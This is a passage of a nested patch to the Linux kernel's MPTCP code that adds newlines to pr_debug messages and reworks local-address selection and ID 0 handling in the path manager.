+-		pr_debug("RM_ADDR: rm_list_nr=%d", mp_opt->rm_list.nr);
++		pr_debug("RM_ADDR: rm_list_nr=%d\n", mp_opt->rm_list.nr);
+ 		break;
+ 
+ 	case MPTCPOPT_MP_PRIO:
+@@ -313,7 +313,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 
+ 		mp_opt->suboptions |= OPTION_MPTCP_PRIO;
+ 		mp_opt->backup = *ptr++ & MPTCP_PRIO_BKUP;
+-		pr_debug("MP_PRIO: prio=%d", mp_opt->backup);
++		pr_debug("MP_PRIO: prio=%d\n", mp_opt->backup);
+ 		break;
+ 
+ 	case MPTCPOPT_MP_FASTCLOSE:
+@@ -324,7 +324,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		mp_opt->rcvr_key = get_unaligned_be64(ptr);
+ 		ptr += 8;
+ 		mp_opt->suboptions |= OPTION_MPTCP_FASTCLOSE;
+-		pr_debug("MP_FASTCLOSE: recv_key=%llu", mp_opt->rcvr_key);
++		pr_debug("MP_FASTCLOSE: recv_key=%llu\n", mp_opt->rcvr_key);
+ 		break;
+ 
+ 	case MPTCPOPT_RST:
+@@ -338,7 +338,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		flags = *ptr++;
+ 		mp_opt->reset_transient = flags & MPTCP_RST_TRANSIENT;
+ 		mp_opt->reset_reason = *ptr;
+-		pr_debug("MP_RST: transient=%u reason=%u",
++		pr_debug("MP_RST: transient=%u reason=%u\n",
+ 			 mp_opt->reset_transient, mp_opt->reset_reason);
+ 		break;
+ 
+@@ -349,7 +349,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		ptr += 2;
+ 		mp_opt->suboptions |= OPTION_MPTCP_FAIL;
+ 		mp_opt->fail_seq = get_unaligned_be64(ptr);
+-		pr_debug("MP_FAIL: data_seq=%llu", mp_opt->fail_seq);
++		pr_debug("MP_FAIL: data_seq=%llu\n", mp_opt->fail_seq);
+ 		break;
+ 
+ 	default:
+@@ -412,7 +412,7 @@ bool mptcp_syn_options(struct sock *sk, const struct sk_buff *skb,
+ 		*size = TCPOLEN_MPTCP_MPC_SYN;
+ 		return true;
+ 	} else if (subflow->request_join) {
+-		pr_debug("remote_token=%u, nonce=%u", subflow->remote_token,
++		pr_debug("remote_token=%u, nonce=%u\n", subflow->remote_token,
+ 			 subflow->local_nonce);
+ 		opts->suboptions = OPTION_MPTCP_MPJ_SYN;
+ 		opts->join_id = subflow->local_id;
+@@ -496,7 +496,7 @@ static bool mptcp_established_options_mp(struct sock *sk, struct sk_buff *skb,
+ 			*size = TCPOLEN_MPTCP_MPC_ACK;
+ 		}
+ 
+-		pr_debug("subflow=%p, local_key=%llu, remote_key=%llu map_len=%d",
++		pr_debug("subflow=%p, local_key=%llu, remote_key=%llu map_len=%d\n",
+ 			 subflow, subflow->local_key, subflow->remote_key,
+ 			 data_len);
+ 
+@@ -505,7 +505,7 @@ static bool mptcp_established_options_mp(struct sock *sk, struct sk_buff *skb,
+ 		opts->suboptions = OPTION_MPTCP_MPJ_ACK;
+ 		memcpy(opts->hmac, subflow->hmac, MPTCPOPT_HMAC_LEN);
+ 		*size = TCPOLEN_MPTCP_MPJ_ACK;
+-		pr_debug("subflow=%p", subflow);
++		pr_debug("subflow=%p\n", subflow);
+ 
+ 		/* we can use the full delegate action helper only from BH context
+ 		 * If we are in process context - sk is flushing the backlog at
+@@ -673,7 +673,7 @@ static bool mptcp_established_options_add_addr(struct sock *sk, struct sk_buff *
+ 
+ 	*size = len;
+ 	if (drop_other_suboptions) {
+-		pr_debug("drop other suboptions");
++		pr_debug("drop other suboptions\n");
+ 		opts->suboptions = 0;
+ 
+ 		/* note that e.g. DSS could have written into the memory
+@@ -690,7 +690,7 @@ static bool mptcp_established_options_add_addr(struct sock *sk, struct sk_buff *
+ 						     msk->remote_key,
+ 						     &opts->addr);
+ 	}
+-	pr_debug("addr_id=%d, ahmac=%llu, echo=%d, port=%d",
++	pr_debug("addr_id=%d, ahmac=%llu, echo=%d, port=%d\n",
+ 		 opts->addr.id, opts->ahmac, echo, ntohs(opts->addr.port));
+ 
+ 	return true;
+@@ -721,7 +721,7 @@ static bool mptcp_established_options_rm_addr(struct sock *sk,
+ 	opts->rm_list = rm_list;
+ 
+ 	for (i = 0; i < opts->rm_list.nr; i++)
+-		pr_debug("rm_list_ids[%d]=%d", i, opts->rm_list.ids[i]);
++		pr_debug("rm_list_ids[%d]=%d\n", i, opts->rm_list.ids[i]);
+ 
+ 	return true;
+ }
+@@ -747,7 +747,7 @@ static bool mptcp_established_options_mp_prio(struct sock *sk,
+ 	opts->suboptions |= OPTION_MPTCP_PRIO;
+ 	opts->backup = subflow->request_bkup;
+ 
+-	pr_debug("prio=%d", opts->backup);
++	pr_debug("prio=%d\n", opts->backup);
+ 
+ 	return true;
+ }
+@@ -789,7 +789,7 @@ static bool mptcp_established_options_fastclose(struct sock *sk,
+ 	opts->suboptions |= OPTION_MPTCP_FASTCLOSE;
+ 	opts->rcvr_key = msk->remote_key;
+ 
+-	pr_debug("FASTCLOSE key=%llu", opts->rcvr_key);
++	pr_debug("FASTCLOSE key=%llu\n", opts->rcvr_key);
+ 	MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPFASTCLOSETX);
+ 	return true;
+ }
+@@ -811,7 +811,7 @@ static bool mptcp_established_options_mp_fail(struct sock *sk,
+ 	opts->suboptions |= OPTION_MPTCP_FAIL;
+ 	opts->fail_seq = subflow->map_seq;
+ 
+-	pr_debug("MP_FAIL fail_seq=%llu", opts->fail_seq);
++	pr_debug("MP_FAIL fail_seq=%llu\n", opts->fail_seq);
+ 	MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPFAILTX);
+ 
+ 	return true;
+@@ -899,7 +899,7 @@ bool mptcp_synack_options(const struct request_sock *req, unsigned int *size,
+ 		opts->csum_reqd = subflow_req->csum_reqd;
+ 		opts->allow_join_id0 = subflow_req->allow_join_id0;
+ 		*size = TCPOLEN_MPTCP_MPC_SYNACK;
+-		pr_debug("subflow_req=%p, local_key=%llu",
++		pr_debug("subflow_req=%p, local_key=%llu\n",
+ 			 subflow_req, subflow_req->local_key);
+ 		return true;
+ 	} else if (subflow_req->mp_join) {
+@@ -908,7 +908,7 @@ bool mptcp_synack_options(const struct request_sock *req, unsigned int *size,
+ 		opts->join_id = subflow_req->local_id;
+ 		opts->thmac = subflow_req->thmac;
+ 		opts->nonce = subflow_req->local_nonce;
+-		pr_debug("req=%p, bkup=%u, id=%u, thmac=%llu, nonce=%u",
++		pr_debug("req=%p, bkup=%u, id=%u, thmac=%llu, nonce=%u\n",
+ 			 subflow_req, opts->backup, opts->join_id,
+ 			 opts->thmac, opts->nonce);
+ 		*size = TCPOLEN_MPTCP_MPJ_SYNACK;
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index 5646c7275a92d..34120694ad49b 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -20,7 +20,7 @@ int mptcp_pm_announce_addr(struct mptcp_sock *msk,
+ {
+ 	u8 add_addr = READ_ONCE(msk->pm.addr_signal);
+ 
+-	pr_debug("msk=%p, local_id=%d, echo=%d", msk, addr->id, echo);
++	pr_debug("msk=%p, local_id=%d, echo=%d\n", msk, addr->id, echo);
+ 
+ 	lockdep_assert_held(&msk->pm.lock);
+ 
+@@ -45,7 +45,7 @@ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_
+ {
+ 	u8 rm_addr = READ_ONCE(msk->pm.addr_signal);
+ 
+-	pr_debug("msk=%p, rm_list_nr=%d", msk, rm_list->nr);
++	pr_debug("msk=%p, rm_list_nr=%d\n", msk, rm_list->nr);
+ 
+ 	if (rm_addr) {
+ 		pr_warn("addr_signal error, rm_addr=%d", rm_addr);
+@@ -65,7 +65,7 @@ void mptcp_pm_new_connection(struct mptcp_sock *msk, const struct sock *ssk, int
+ {
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 
+-	pr_debug("msk=%p, token=%u side=%d", msk, msk->token, server_side);
++	pr_debug("msk=%p, token=%u side=%d\n", msk, msk->token, server_side);
+ 
+ 	WRITE_ONCE(pm->server_side, server_side);
+ 	mptcp_event(MPTCP_EVENT_CREATED, msk, ssk, GFP_ATOMIC);
+@@ -89,7 +89,7 @@ bool mptcp_pm_allow_new_subflow(struct mptcp_sock *msk)
+ 
+ 	subflows_max = mptcp_pm_get_subflows_max(msk);
+ 
+-	pr_debug("msk=%p subflows=%d max=%d allow=%d", msk, pm->subflows,
++	pr_debug("msk=%p subflows=%d max=%d allow=%d\n", msk, pm->subflows,
+ 		 subflows_max, READ_ONCE(pm->accept_subflow));
+ 
+ 	/* try to avoid acquiring the lock below */
+@@ -113,7 +113,7 @@ bool mptcp_pm_allow_new_subflow(struct mptcp_sock *msk)
+ static bool mptcp_pm_schedule_work(struct mptcp_sock *msk,
+ 				   enum mptcp_pm_status new_status)
+ {
+-	pr_debug("msk=%p status=%x new=%lx", msk, msk->pm.status,
++	pr_debug("msk=%p status=%x new=%lx\n", msk, msk->pm.status,
+ 		 BIT(new_status));
+ 	if (msk->pm.status & BIT(new_status))
+ 		return false;
+@@ -128,7 +128,7 @@ void mptcp_pm_fully_established(struct mptcp_sock *msk, const struct sock *ssk,
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 	bool announce = false;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	spin_lock_bh(&pm->lock);
+ 
+@@ -152,14 +152,14 @@ void mptcp_pm_fully_established(struct mptcp_sock *msk, const struct sock *ssk,
+ 
+ void mptcp_pm_connection_closed(struct mptcp_sock *msk)
+ {
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ }
+ 
+ void mptcp_pm_subflow_established(struct mptcp_sock *msk)
+ {
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	if (!READ_ONCE(pm->work_pending))
+ 		return;
+@@ -211,7 +211,7 @@ void mptcp_pm_add_addr_received(const struct sock *ssk,
+ 	struct mptcp_sock *msk = mptcp_sk(subflow->conn);
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 
+-	pr_debug("msk=%p remote_id=%d accept=%d", msk, addr->id,
++	pr_debug("msk=%p remote_id=%d accept=%d\n", msk, addr->id,
+ 		 READ_ONCE(pm->accept_addr));
+ 
+ 	mptcp_event_addr_announced(ssk, addr);
+@@ -244,7 +244,7 @@ void mptcp_pm_add_addr_echoed(struct mptcp_sock *msk,
+ {
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	spin_lock_bh(&pm->lock);
+ 
+@@ -268,7 +268,7 @@ void mptcp_pm_rm_addr_received(struct mptcp_sock *msk,
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 	u8 i;
+ 
+-	pr_debug("msk=%p remote_ids_nr=%d", msk, rm_list->nr);
++	pr_debug("msk=%p remote_ids_nr=%d\n", msk, rm_list->nr);
+ 
+ 	for (i = 0; i < rm_list->nr; i++)
+ 		mptcp_event_addr_removed(msk, rm_list->ids[i]);
+@@ -307,19 +307,19 @@ void mptcp_pm_mp_fail_received(struct sock *sk, u64 fail_seq)
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(sk);
+ 	struct mptcp_sock *msk = mptcp_sk(subflow->conn);
+ 
+-	pr_debug("fail_seq=%llu", fail_seq);
++	pr_debug("fail_seq=%llu\n", fail_seq);
+ 
+ 	if (!READ_ONCE(msk->allow_infinite_fallback))
+ 		return;
+ 
+ 	if (!subflow->fail_tout) {
+-		pr_debug("send MP_FAIL response and infinite map");
++		pr_debug("send MP_FAIL response and infinite map\n");
+ 
+ 		subflow->send_mp_fail = 1;
+ 		subflow->send_infinite_map = 1;
+ 		tcp_send_ack(sk);
+ 	} else {
+-		pr_debug("MP_FAIL response received");
++		pr_debug("MP_FAIL response received\n");
+ 		WRITE_ONCE(subflow->fail_tout, 0);
+ 	}
+ }
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 9e16ae1b23fc7..f001e15474029 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -150,12 +150,14 @@ static bool lookup_subflow_by_daddr(const struct list_head *list,
+ 	return false;
+ }
+ 
+-static struct mptcp_pm_addr_entry *
++static bool
+ select_local_address(const struct pm_nl_pernet *pernet,
+-		     const struct mptcp_sock *msk)
++		     const struct mptcp_sock *msk,
++		     struct mptcp_pm_addr_entry *new_entry)
+ {
+ 	const struct sock *sk = (const struct sock *)msk;
+-	struct mptcp_pm_addr_entry *entry, *ret = NULL;
++	struct mptcp_pm_addr_entry *entry;
++	bool found = false;
+ 
+ 	msk_owned_by_me(msk);
+ 
+@@ -177,17 +179,21 @@ select_local_address(const struct pm_nl_pernet *pernet,
+ 				continue;
+ 		}
+ 
+-		ret = entry;
++		*new_entry = *entry;
++		found = true;
+ 		break;
+ 	}
+ 	rcu_read_unlock();
+-	return ret;
++
++	return found;
+ }
+ 
+-static struct mptcp_pm_addr_entry *
+-select_signal_address(struct pm_nl_pernet *pernet, const struct mptcp_sock *msk)
++static bool
++select_signal_address(struct pm_nl_pernet *pernet, const struct mptcp_sock *msk,
++		      struct mptcp_pm_addr_entry *new_entry)
+ {
+-	struct mptcp_pm_addr_entry *entry, *ret = NULL;
++	struct mptcp_pm_addr_entry *entry;
++	bool found = false;
+ 
+ 	rcu_read_lock();
+ 	/* do not keep any additional per socket state, just signal
+@@ -202,11 +208,13 @@ select_signal_address(struct pm_nl_pernet *pernet, const struct mptcp_sock *msk)
+ 		if (!(entry->flags & MPTCP_PM_ADDR_FLAG_SIGNAL))
+ 			continue;
+ 
+-		ret = entry;
++		*new_entry = *entry;
++		found = true;
+ 		break;
+ 	}
+ 	rcu_read_unlock();
+-	return ret;
++
++	return found;
+ }
+ 
+ unsigned int mptcp_pm_get_add_addr_signal_max(const struct mptcp_sock *msk)
+@@ -297,7 +305,7 @@ static void mptcp_pm_add_timer(struct timer_list *timer)
+ 	struct mptcp_sock *msk = entry->sock;
+ 	struct sock *sk = (struct sock *)msk;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	if (!msk)
+ 		return;
+@@ -316,7 +324,7 @@ static void mptcp_pm_add_timer(struct timer_list *timer)
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+ 	if (!mptcp_pm_should_add_signal_addr(msk)) {
+-		pr_debug("retransmit ADD_ADDR id=%d", entry->addr.id);
++		pr_debug("retransmit ADD_ADDR id=%d\n", entry->addr.id);
+ 		mptcp_pm_announce_addr(msk, &entry->addr, false);
+ 		mptcp_pm_add_addr_send_ack(msk);
+ 		entry->retrans_times++;
+@@ -397,7 +405,7 @@ void mptcp_pm_free_anno_list(struct mptcp_sock *msk)
+ 	struct sock *sk = (struct sock *)msk;
+ 	LIST_HEAD(free_list);
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	list_splice_init(&msk->pm.anno_list, &free_list);
+@@ -474,7 +482,7 @@ static void __mptcp_pm_send_ack(struct mptcp_sock *msk, struct mptcp_subflow_con
+ 	struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 	bool slow;
+ 
+-	pr_debug("send ack for %s",
++	pr_debug("send ack for %s\n",
+ 		 prio ? "mp_prio" : (mptcp_pm_should_add_signal(msk) ? "add_addr" : "rm_addr"));
+ 
+ 	slow = lock_sock_fast(ssk);
+@@ -527,9 +535,10 @@ __lookup_addr(struct pm_nl_pernet *pernet, const struct mptcp_addr_info *info,
+ 
+ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ {
+-	struct mptcp_pm_addr_entry *local, *signal_and_subflow = NULL;
+ 	struct sock *sk = (struct sock *)msk;
++	struct mptcp_pm_addr_entry local;
+ 	unsigned int add_addr_signal_max;
++	bool signal_and_subflow = false;
+ 	unsigned int local_addr_max;
+ 	struct pm_nl_pernet *pernet;
+ 	unsigned int subflows_max;
+@@ -580,23 +589,27 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		if (msk->pm.addr_signal & BIT(MPTCP_ADD_ADDR_SIGNAL))
+ 			return;
+ 
+-		local = select_signal_address(pernet, msk);
+-		if (!local)
++		if (!select_signal_address(pernet, msk, &local))
+ 			goto subflow;
+ 
+ 		/* If the alloc fails, we are on memory pressure, not worth
+ 		 * continuing, and trying to create subflows.
+ 		 */
+-		if (!mptcp_pm_alloc_anno_list(msk, &local->addr))
++		if (!mptcp_pm_alloc_anno_list(msk, &local.addr))
+ 			return;
+ 
+-		__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
++		__clear_bit(local.addr.id, msk->pm.id_avail_bitmap);
+ 		msk->pm.add_addr_signaled++;
+-		mptcp_pm_announce_addr(msk, &local->addr, false);
++
++		/* Special case for ID0: set the correct ID */
++		if (local.addr.id == msk->mpc_endpoint_id)
++			local.addr.id = 0;
++
++		mptcp_pm_announce_addr(msk, &local.addr, false);
+ 		mptcp_pm_nl_addr_send_ack(msk);
+ 
+-		if (local->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW)
+-			signal_and_subflow = local;
++		if (local.flags & MPTCP_PM_ADDR_FLAG_SUBFLOW)
++			signal_and_subflow = true;
+ 	}
+ 
+ subflow:
+@@ -607,24 +620,28 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		bool fullmesh;
+ 		int i, nr;
+ 
+-		if (signal_and_subflow) {
+-			local = signal_and_subflow;
+-			signal_and_subflow = NULL;
+-		} else {
+-			local = select_local_address(pernet, msk);
+-			if (!local)
+-				break;
+-		}
++		if (signal_and_subflow)
++			signal_and_subflow = false;
++		else if (!select_local_address(pernet, msk, &local))
++			break;
++
++		fullmesh = !!(local.flags & MPTCP_PM_ADDR_FLAG_FULLMESH);
++
++		__clear_bit(local.addr.id, msk->pm.id_avail_bitmap);
+ 
+-		fullmesh = !!(local->flags & MPTCP_PM_ADDR_FLAG_FULLMESH);
++		/* Special case for ID0: set the correct ID */
++		if (local.addr.id == msk->mpc_endpoint_id)
++			local.addr.id = 0;
++		else /* local_addr_used is not decr for ID 0 */
++			msk->pm.local_addr_used++;
++
++		nr = fill_remote_addresses_vec(msk, &local.addr, fullmesh, addrs);
++		if (nr == 0)
++			continue;
+ 
+-		msk->pm.local_addr_used++;
+-		nr = fill_remote_addresses_vec(msk, &local->addr, fullmesh, addrs);
+-		if (nr)
+-			__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 		for (i = 0; i < nr; i++)
+-			__mptcp_subflow_connect(sk, &local->addr, &addrs[i]);
++			__mptcp_subflow_connect(sk, &local.addr, &addrs[i]);
+ 		spin_lock_bh(&msk->pm.lock);
+ 	}
+ 	mptcp_pm_nl_check_work_pending(msk);
+@@ -648,7 +665,7 @@ static unsigned int fill_local_addresses_vec(struct mptcp_sock *msk,
+ {
+ 	struct sock *sk = (struct sock *)msk;
+ 	struct mptcp_pm_addr_entry *entry;
+-	struct mptcp_addr_info local;
++	struct mptcp_addr_info mpc_addr;
+ 	struct pm_nl_pernet *pernet;
+ 	unsigned int subflows_max;
+ 	int i = 0;
+@@ -656,6 +673,8 @@ static unsigned int fill_local_addresses_vec(struct mptcp_sock *msk,
+ 	pernet = pm_nl_get_pernet_from_msk(msk);
+ 	subflows_max = mptcp_pm_get_subflows_max(msk);
+ 
++	mptcp_local_address((struct sock_common *)msk, &mpc_addr);
++
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(entry, &pernet->local_addr_list, list) {
+ 		if (!(entry->flags & MPTCP_PM_ADDR_FLAG_FULLMESH))
+@@ -673,7 +692,13 @@ static unsigned int fill_local_addresses_vec(struct mptcp_sock *msk,
+ 
+ 		if (msk->pm.subflows < subflows_max) {
+ 			msk->pm.subflows++;
+-			addrs[i++] = entry->addr;
++			addrs[i] = entry->addr;
++
++			/* Special case for ID0: set the correct ID */
++			if (mptcp_addresses_equal(&entry->addr, &mpc_addr, entry->addr.port))
++				addrs[i].id = 0;
++
++			i++;
+ 		}
+ 	}
+ 	rcu_read_unlock();
+@@ -682,6 +707,8 @@ static unsigned int fill_local_addresses_vec(struct mptcp_sock *msk,
+ 	 * 'IPADDRANY' local address
+ 	 */
+ 	if (!i) {
++		struct mptcp_addr_info local;
++
+ 		memset(&local, 0, sizeof(local));
+ 		local.family = msk->pm.remote.family;
+ 
+@@ -705,7 +732,7 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	add_addr_accept_max = mptcp_pm_get_add_addr_accept_max(msk);
+ 	subflows_max = mptcp_pm_get_subflows_max(msk);
+ 
+-	pr_debug("accepted %d:%d remote family %d",
++	pr_debug("accepted %d:%d remote family %d\n",
+ 		 msk->pm.add_addr_accepted, add_addr_accept_max,
+ 		 msk->pm.remote.family);
+ 
+@@ -732,7 +759,9 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+ 	if (sf_created) {
+-		msk->pm.add_addr_accepted++;
++		/* add_addr_accepted is not decr for ID 0 */
++		if (remote.id)
++			msk->pm.add_addr_accepted++;
+ 		if (msk->pm.add_addr_accepted >= add_addr_accept_max ||
+ 		    msk->pm.subflows >= subflows_max)
+ 			WRITE_ONCE(msk->pm.accept_addr, false);
+@@ -774,7 +803,7 @@ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 
+-	pr_debug("bkup=%d", bkup);
++	pr_debug("bkup=%d\n", bkup);
+ 
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+@@ -797,11 +826,6 @@ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+ 	return -EINVAL;
+ }
+ 
+-static bool mptcp_local_id_match(const struct mptcp_sock *msk, u8 local_id, u8 id)
+-{
+-	return local_id == id || (!local_id && msk->mpc_endpoint_id == id);
+-}
+-
+ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 					   const struct mptcp_rm_list *rm_list,
+ 					   enum linux_mptcp_mib_field rm_type)
+@@ -810,7 +834,7 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 	struct sock *sk = (struct sock *)msk;
+ 	u8 i;
+ 
+-	pr_debug("%s rm_list_nr %d",
++	pr_debug("%s rm_list_nr %d\n",
+ 		 rm_type == MPTCP_MIB_RMADDR ? "address" : "subflow", rm_list->nr);
+ 
+ 	msk_owned_by_me(msk);
+@@ -838,10 +862,10 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 				continue;
+ 			if (rm_type == MPTCP_MIB_RMADDR && remote_id != rm_id)
+ 				continue;
+-			if (rm_type == MPTCP_MIB_RMSUBFLOW && !mptcp_local_id_match(msk, id, rm_id))
++			if (rm_type == MPTCP_MIB_RMSUBFLOW && id != rm_id)
+ 				continue;
+ 
+-			pr_debug(" -> %s rm_list_ids[%d]=%u local_id=%u remote_id=%u mpc_id=%u",
++			pr_debug(" -> %s rm_list_ids[%d]=%u local_id=%u remote_id=%u mpc_id=%u\n",
+ 				 rm_type == MPTCP_MIB_RMADDR ? "address" : "subflow",
+ 				 i, rm_id, id, remote_id, msk->mpc_endpoint_id);
+ 			spin_unlock_bh(&msk->pm.lock);
+@@ -898,7 +922,7 @@ void mptcp_pm_nl_work(struct mptcp_sock *msk)
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+-	pr_debug("msk=%p status=%x", msk, pm->status);
++	pr_debug("msk=%p status=%x\n", msk, pm->status);
+ 	if (pm->status & BIT(MPTCP_PM_ADD_ADDR_RECEIVED)) {
+ 		pm->status &= ~BIT(MPTCP_PM_ADD_ADDR_RECEIVED);
+ 		mptcp_pm_nl_add_addr_received(msk);
+@@ -1472,6 +1496,12 @@ static bool remove_anno_list_by_saddr(struct mptcp_sock *msk,
+ 	return false;
+ }
+ 
++static u8 mptcp_endp_get_local_id(struct mptcp_sock *msk,
++				  const struct mptcp_addr_info *addr)
++{
++	return msk->mpc_endpoint_id == addr->id ? 0 : addr->id;
++}
++
+ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 				      const struct mptcp_addr_info *addr,
+ 				      bool force)
+@@ -1479,7 +1509,7 @@ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 	struct mptcp_rm_list list = { .nr = 0 };
+ 	bool ret;
+ 
+-	list.ids[list.nr++] = addr->id;
++	list.ids[list.nr++] = mptcp_endp_get_local_id(msk, addr);
+ 
+ 	ret = remove_anno_list_by_saddr(msk, addr);
+ 	if (ret || force) {
+@@ -1506,13 +1536,11 @@ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 						   const struct mptcp_pm_addr_entry *entry)
+ {
+ 	const struct mptcp_addr_info *addr = &entry->addr;
+-	struct mptcp_rm_list list = { .nr = 0 };
++	struct mptcp_rm_list list = { .nr = 1 };
+ 	long s_slot = 0, s_num = 0;
+ 	struct mptcp_sock *msk;
+ 
+-	pr_debug("remove_id=%d", addr->id);
+-
+-	list.ids[list.nr++] = addr->id;
++	pr_debug("remove_id=%d\n", addr->id);
+ 
+ 	while ((msk = mptcp_token_iter_next(net, &s_slot, &s_num)) != NULL) {
+ 		struct sock *sk = (struct sock *)msk;
+@@ -1531,6 +1559,7 @@ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 		mptcp_pm_remove_anno_addr(msk, addr, remove_subflow &&
+ 					  !(entry->flags & MPTCP_PM_ADDR_FLAG_IMPLICIT));
+ 
++		list.ids[0] = mptcp_endp_get_local_id(msk, addr);
+ 		if (remove_subflow) {
+ 			spin_lock_bh(&msk->pm.lock);
+ 			mptcp_pm_nl_rm_subflow_received(msk, &list);
+@@ -1639,6 +1668,7 @@ static int mptcp_nl_cmd_del_addr(struct sk_buff *skb, struct genl_info *info)
+ 	return ret;
+ }
+ 
++/* Called from the userspace PM only */
+ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
+ {
+ 	struct mptcp_rm_list alist = { .nr = 0 };
+@@ -1667,8 +1697,9 @@ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
+ 	}
+ }
+ 
+-void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+-					struct list_head *rm_list)
++/* Called from the in-kernel PM only */
++static void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
++					       struct list_head *rm_list)
+ {
+ 	struct mptcp_rm_list alist = { .nr = 0 }, slist = { .nr = 0 };
+ 	struct mptcp_pm_addr_entry *entry;
+@@ -1676,11 +1707,11 @@ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 	list_for_each_entry(entry, rm_list, list) {
+ 		if (slist.nr < MPTCP_RM_IDS_MAX &&
+ 		    lookup_subflow_by_saddr(&msk->conn_list, &entry->addr))
+-			slist.ids[slist.nr++] = entry->addr.id;
++			slist.ids[slist.nr++] = mptcp_endp_get_local_id(msk, &entry->addr);
+ 
+ 		if (alist.nr < MPTCP_RM_IDS_MAX &&
+ 		    remove_anno_list_by_saddr(msk, &entry->addr))
+-			alist.ids[alist.nr++] = entry->addr.id;
++			alist.ids[alist.nr++] = mptcp_endp_get_local_id(msk, &entry->addr);
+ 	}
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+@@ -1968,7 +1999,7 @@ static void mptcp_pm_nl_fullmesh(struct mptcp_sock *msk,
+ {
+ 	struct mptcp_rm_list list = { .nr = 0 };
+ 
+-	list.ids[list.nr++] = addr->id;
++	list.ids[list.nr++] = mptcp_endp_get_local_id(msk, addr);
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	mptcp_pm_nl_rm_subflow_received(msk, &list);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 258dbfe9fad30..62a2da0f2b54d 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -152,7 +152,7 @@ static bool mptcp_try_coalesce(struct sock *sk, struct sk_buff *to,
+ 	    !skb_try_coalesce(to, from, &fragstolen, &delta))
+ 		return false;
+ 
+-	pr_debug("colesced seq %llx into %llx new len %d new end seq %llx",
++	pr_debug("colesced seq %llx into %llx new len %d new end seq %llx\n",
+ 		 MPTCP_SKB_CB(from)->map_seq, MPTCP_SKB_CB(to)->map_seq,
+ 		 to->len, MPTCP_SKB_CB(from)->end_seq);
+ 	MPTCP_SKB_CB(to)->end_seq = MPTCP_SKB_CB(from)->end_seq;
+@@ -230,7 +230,7 @@ static void mptcp_data_queue_ofo(struct mptcp_sock *msk, struct sk_buff *skb)
+ 	end_seq = MPTCP_SKB_CB(skb)->end_seq;
+ 	max_seq = atomic64_read(&msk->rcv_wnd_sent);
+ 
+-	pr_debug("msk=%p seq=%llx limit=%llx empty=%d", msk, seq, max_seq,
++	pr_debug("msk=%p seq=%llx limit=%llx empty=%d\n", msk, seq, max_seq,
+ 		 RB_EMPTY_ROOT(&msk->out_of_order_queue));
+ 	if (after64(end_seq, max_seq)) {
+ 		/* out of window */
